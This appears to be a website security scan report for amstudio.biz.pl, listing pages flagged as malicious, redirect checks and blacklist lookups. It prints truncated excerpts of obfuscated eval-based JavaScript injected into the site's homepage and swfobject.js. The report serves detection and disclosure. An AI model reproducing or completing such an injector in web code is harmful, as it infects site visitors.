Scanned pages/files
Request | Server response | Status |
http://www.amstudio.biz.pl/ | 200 OK Content-Length: 6473 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=15;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,113,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,113,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,89,93,108,110,98,91,89,103,109,102 Antivirus reports:
| ||
http://www.amstudio.biz.pl/scripts/swfobject/swfobject.js | 200 OK Content-Length: 12090 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=64;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,96,110,107,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,93,112,109,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,93,92,107,109,97,95 Antivirus reports:
| ||
http://www.amstudio.biz.pl/test404page.js | 404 Not Found Content-Length: 185 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: amstudio.biz.pl
Result:
GET / HTTP/1.1
Host: amstudio.biz.pl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: amstudio.biz.pl
Referer: http://www.google.com/search?q=amstudio.biz.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: amstudio.biz.pl
Referer: http://www.google.com/search?q=amstudio.biz.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amstudio.biz.pl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://amstudio.biz.pl/
Result: amstudio.biz.pl is not infected or malware details are not published yet.
Result: amstudio.biz.pl is not infected or malware details are not published yet.